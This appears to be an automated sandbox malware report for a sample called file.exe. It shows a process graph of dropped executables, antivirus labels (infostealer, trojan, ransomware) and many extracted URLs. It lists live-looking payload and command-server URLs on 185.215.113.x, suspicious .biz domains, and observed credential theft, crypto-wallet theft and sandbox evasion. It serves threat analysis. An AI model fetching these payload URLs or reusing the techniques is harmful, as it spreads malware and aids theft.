                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1571971 Sample: file.exe Startdate: 09/12/2024 Architecture: WINDOWS Score: 100 86 youtube.com 2->86 88 spocs.getpocket.com 2->88 90 18 other IPs or domains 2->90 112 Suricata IDS alerts for network traffic 2->112 114 Found malware configuration 2->114 116 Antivirus detection for URL or domain 2->116 118 16 other signatures 2->118 9 skotes.exe 4 25 2->9         started        14 file.exe 5 2->14         started        16 ae5cfd188c.exe 2->16         started        18 6 other processes 2->18 signatures3 process4 dnsIp5 106 185.215.113.43, 49758, 49764, 49787 WHOLESALECONNECTIONSNL Portugal 9->106 108 185.215.113.16, 49770, 49791, 49815 WHOLESALECONNECTIONSNL Portugal 9->108 74 C:\Users\user\AppData\...\9c2827fca4.exe, PE32 9->74 dropped 76 C:\Users\user\AppData\...\2ada66c192.exe, PE32 9->76 dropped 78 C:\Users\user\AppData\...\37df924488.exe, PE32 9->78 dropped 84 5 other malicious files 9->84 dropped 146 Creates multiple autostart registry keys 9->146 148 Hides threads from debuggers 9->148 150 Tries to detect sandboxes / dynamic malware analysis system (registry check) 9->150 20 ae5cfd188c.exe 12 9->20         started        24 9c2827fca4.exe 9->24         started        26 37df924488.exe 13 9->26         started        28 2ada66c192.exe 9->28         started        80 C:\Users\user\AppData\Local\...\skotes.exe, PE32 14->80 dropped 82 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 14->82 dropped 152 Detected unpacking (changes PE section rights) 14->152 154 Tries to evade debugger and weak emulator (self modifying code) 14->154 156 Tries to detect virtualization through RDTSC time measurements 14->156 30 skotes.exe 14->30         started        158 Query firmware table information (likely to detect VMs) 16->158 160 Found many strings related to Crypto-Wallets (likely being stolen) 16->160 162 Tries to harvest and steal ftp login credentials 16->162 168 2 other signatures 16->168 164 Binary is likely a compiled AutoIt script file 18->164 166 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 18->166 32 firefox.exe 18->32         started        34 taskkill.exe 18->34         started        36 taskkill.exe 18->36         started        38 3 other processes 18->38 file6 signatures7 process8 dnsIp9 92 atten-supporse.biz 104.21.48.1, 443, 49781, 49790 CLOUDFLARENETUS United States 20->92 120 Antivirus detection for dropped file 20->120 122 Multi AV Scanner detection for dropped file 20->122 124 Detected unpacking (changes PE section rights) 20->124 138 3 other signatures 20->138 40 chrome.exe 20->40         started        43 chrome.exe 20->43         started        126 Tries to detect sandboxes and other dynamic analysis tools (window names) 24->126 128 Machine Learning detection for dropped file 24->128 130 Modifies windows update settings 24->130 140 3 other signatures 24->140 94 185.215.113.206, 49807, 49870, 80 WHOLESALECONNECTIONSNL Portugal 26->94 142 3 other signatures 26->142 132 Binary is likely a compiled AutoIt script file 28->132 134 Found API chain indicative of sandbox detection 28->134 45 taskkill.exe 28->45         started        47 taskkill.exe 28->47         started        53 4 other processes 28->53 136 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 30->136 144 2 other signatures 30->144 96 youtube.com 142.250.181.78, 443, 49875, 49876 GOOGLEUS United States 32->96 98 prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82, 49879, 49892, 49896 GOOGLEUS United States 32->98 100 5 other IPs or domains 32->100 55 2 other processes 32->55 49 conhost.exe 34->49         started        51 conhost.exe 36->51         started        57 3 other processes 38->57 signatures10 process11 dnsIp12 102 192.168.2.4, 138, 443, 49723 unknown unknown 40->102 104 239.255.255.250 unknown Reserved 40->104 59 chrome.exe 40->59         started        62 chrome.exe 43->62         started        64 conhost.exe 45->64         started        66 conhost.exe 47->66         started        68 conhost.exe 53->68         started        70 conhost.exe 53->70         started        72 conhost.exe 53->72         started        process13 dnsIp14 110 www.google.com 142.250.181.68, 443, 49951 GOOGLEUS United States 59->110

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand
                          SourceDetectionScannerLabelLink
                          file.exe55%ReversingLabsWin32.Infostealer.Tinba
                          file.exe100%AviraTR/Crypt.TPM.Gen
                          file.exe100%Joe Sandbox ML
                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe100%AviraTR/Crypt.TPM.Gen
                          C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe100%AviraTR/ATRAPS.Gen
                          C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe100%AviraTR/Crypt.XPACK.Gen
                          C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe100%AviraTR/Crypt.TPM.Gen
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%AviraTR/ATRAPS.Gen
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%AviraTR/Crypt.XPACK.Gen
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%AviraTR/Crypt.TPM.Gen
                          C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe39%ReversingLabsWin32.Trojan.Symmi
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe24%ReversingLabsWin32.Ransomware.Generic
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe45%ReversingLabsWin32.Infostealer.Tinba
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe45%ReversingLabsWin32.Trojan.Symmi
                          C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe39%ReversingLabsWin32.Trojan.Symmi
                          C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe45%ReversingLabsWin32.Trojan.Symmi
                          C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe24%ReversingLabsWin32.Ransomware.Generic
                          C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe45%ReversingLabsWin32.Infostealer.Tinba
                          C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe55%ReversingLabsWin32.Infostealer.Tinba
                          No Antivirus matches
                          No Antivirus matches
                          SourceDetectionScannerLabelLink
                          http://185.215.113.16/off/random.exeb100%Avira URL Cloudmalware
                          http://185.215.113.43/Zu7JuNko/index.php95dA100%Avira URL Cloudmalware
                          http://185.215.113.206/c4becf79229cb002.php/a100%Avira URL Cloudmalware
                          http://185.215.113.43/Zu7JuNko/index.phpa4100%Avira URL Cloudmalware
                          http://185.215.113.16/steam/random.exe_100%Avira URL Cloudmalware
                          NameIPActiveMaliciousAntivirus DetectionReputation
                          example.org
                          93.184.215.14
                          truefalse
                            high
                            atten-supporse.biz
                            104.21.48.1
                            truefalse
                              high
                              prod.classify-client.prod.webservices.mozgcp.net
                              35.190.72.216
                              truefalse
                                high
                                prod.balrog.prod.cloudops.mozgcp.net
                                35.244.181.201
                                truefalse
                                  high
                                  prod.detectportal.prod.cloudops.mozgcp.net
                                  34.107.221.82
                                  truefalse
                                    high
                                    ipv4only.arpa
                                    192.0.0.170
                                    truefalse
                                      high
                                      prod.ads.prod.webservices.mozgcp.net
                                      34.117.188.166
                                      truefalse
                                        high
                                        www.google.com
                                        142.250.181.68
                                        truefalse
                                          high
                                          s-part-0035.t-0009.t-msedge.net
                                          13.107.246.63
                                          truefalse
                                            high
                                            contile.services.mozilla.com
                                            34.117.188.166
                                            truefalse
                                              high
                                              youtube.com
                                              142.250.181.78
                                              truefalse
                                                high
                                                prod.content-signature-chains.prod.webservices.mozgcp.net
                                                34.160.144.191
                                                truefalse
                                                  high
                                                  js.monitor.azure.com
                                                  unknown
                                                  unknownfalse
                                                    high
                                                    spocs.getpocket.com
                                                    unknown
                                                    unknownfalse
                                                      high
                                                      detectportal.firefox.com
                                                      unknown
                                                      unknownfalse
                                                        high
                                                        content-signature-2.cdn.mozilla.net
                                                        unknown
                                                        unknownfalse
                                                          high
                                                          NameMaliciousAntivirus DetectionReputation
                                                          http://185.215.113.206/false
                                                            high
                                                            formy-spill.bizfalse
                                                              high
                                                              https://atten-supporse.biz/apifalse
                                                                high
                                                                atten-supporse.bizfalse
                                                                  high
                                                                  dwell-exclaim.bizfalse
                                                                    high
                                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                                    https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                      high
                                                                      https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                        high
                                                                        https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/recordsfirefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://merino.services.mozilla.com/api/v1/suggestfirefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2792299128.000002BA49CD7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2785432044.000001B8C5372000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A786000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://mozilla.ofirefox.exe, 00000018.00000002.2889544343.00002AF0BFD00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2889827871.000034BEA5600000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://185.215.113.206/ws37df924488.exe, 00000009.00000002.2578174288.0000000001498000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://spocs.getpocket.com/spocsfirefox.exe, 00000018.00000002.2881483129.000002BA63435000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2857928108.000002BA5D0D2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A231000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2737097313.000002BA61CB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2871904573.000002BA61A03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA5964A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2875505657.000002BA61CAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=UTF-8&mode=blended&tag=mozillfirefox.exe, 00000018.00000002.2827730700.000002BA5A461000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://screenshots.firefox.comfirefox.exe, 00000018.00000002.2809778465.000002BA57CE1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2792299128.000002BA49C03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://ads.stickyadstv.com/firefox-etpfirefox.exe, 00000018.00000002.2839565999.000002BA5B5FD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B710000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B75A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2839565999.000002BA5B580000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841657939.000002BA5B852000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://185.215.113.43/Zu7JuNko/index.phpa4skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: malware
                                                                                        unknown
                                                                                        https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEMfirefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://www.amazon.com/exec/obidos/external-search/firefox.exe, 00000018.00000002.2827730700.000002BA5A461000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E26000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2814174699.000002BA59800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000003.2658761411.000002BA59700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2660636691.000002BA5993C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2661028911.000002BA5995A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2821559085.000002BA59F56000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2661653128.000002BA59977000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://mozilla.org/.firefox.exe, 00000018.00000002.2889544343.00002AF0BFD00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://mozilla.org/0firefox.exe, 00000018.00000002.2889544343.00002AF0BFD00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://github.com/mozilla-services/screenshotsfirefox.exe, 00000018.00000003.2659017231.000002BA5991F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2814174699.000002BA59800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000003.2658761411.000002BA59700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2660636691.000002BA5993C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2661028911.000002BA5995A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2661653128.000002BA59977000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureRequestfirefox.exe, 00000018.00000002.2814321427.000002BA598A0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=panel-deffirefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://tracking-protection-issues.herokuapp.com/newfirefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-reportfirefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://185.215.113.43/Zu7JuNko/index.php95dAskotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: malware
                                                                                                          unknown
                                                                                                          https://ok.ru/firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsThefirefox.exe, 00000018.00000002.2814321427.000002BA598A0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabMozRequestFullScfirefox.exe, 00000018.00000002.2842712823.000002BA5B9B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaae5cfd188c.exe, 00000007.00000003.2547024349.0000000005600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2794739483.000002BA554AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56B17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2785432044.000001B8C53C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A7F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://mozilla.org/#/properties/quickSuggestAllowPositionInSuggestionsfirefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://185.215.113.16/off/random.exebskotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: malware
                                                                                                                      unknown
                                                                                                                      http://win.mail.ru/cgi-bin/sentmsg?mailto=%sfirefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2797233592.000002BA55A7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://www.ecosia.org/newtab/ae5cfd188c.exe, 00000007.00000003.2496735561.000000000561F000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2496918281.0000000005608000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630590484.0000000005428000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630411285.000000000543F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://MD8.mozilla.org/1/mfirefox.exe, 00000018.00000002.2852168506.000002BA5C4A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://www.bbc.co.uk/firefox.exe, 00000018.00000002.2888920201.000026C2BC404000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://mozilla.org/#/properties/quickSuggestImpressionCapsSponsoredEnabledfirefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2852168506.000002BA5C4BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A7C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://searchfox.org/mozilla-central/source/toolkit/components/search/SearchUtils.jsm#145-152firefox.exe, 00000018.00000002.2837480713.000002BA5ADEA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://bugzilla.mofirefox.exe, 00000018.00000002.2842971512.000002BA5BA03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813831095.000002BA597AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2842971512.000002BA5BA95000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://mitmdetection.services.mozilla.com/firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/itemsresource://gre/modulfirefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://185.215.113.16/off/def.exeae5cfd188c.exe, 00000007.00000003.2751970018.0000000000C5C000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2752889103.0000000000C44000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2751970018.0000000000C73000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2752988072.0000000000C73000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://spocs.getpocket.com/firefox.exe, 00000018.00000002.2883372314.000002BA63796000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2864606177.000002BA5D403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A231000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2737097313.000002BA61CB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2875505657.000002BA61CAF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A712000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://atten-supporse.biz/ae5cfd188c.exe, 0000000A.00000003.2787137785.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2753582951.000000000543C000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2750675747.000000000543C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://services.addons.mozilla.org/api/v4/abuse/report/addon/firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-ffirefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://ebay.comPfirefox.exe, 00000018.00000002.2886166420.0000180E51A04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://www.iqiyi.com/firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://mozilla.org/#/properties/addonsFeatureGatefirefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://monitor.firefox.com/user/breach-stats?includeResolved=truefirefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-reportfirefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://mozilla.org/#/properties/addonsShowLessFrequentlyCapfirefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://bugzilla.mozilla.org/show_bug.cgi?id=1584464firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2871904573.000002BA61A45000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://mail.google.com/mail/?extsrc=mailto&url=%shttps://mail.google.com/mail/?extsrc=mailto&url=%sfirefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://yandex.comfirefox.exe, 00000018.00000002.2886166420.0000180E51A04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
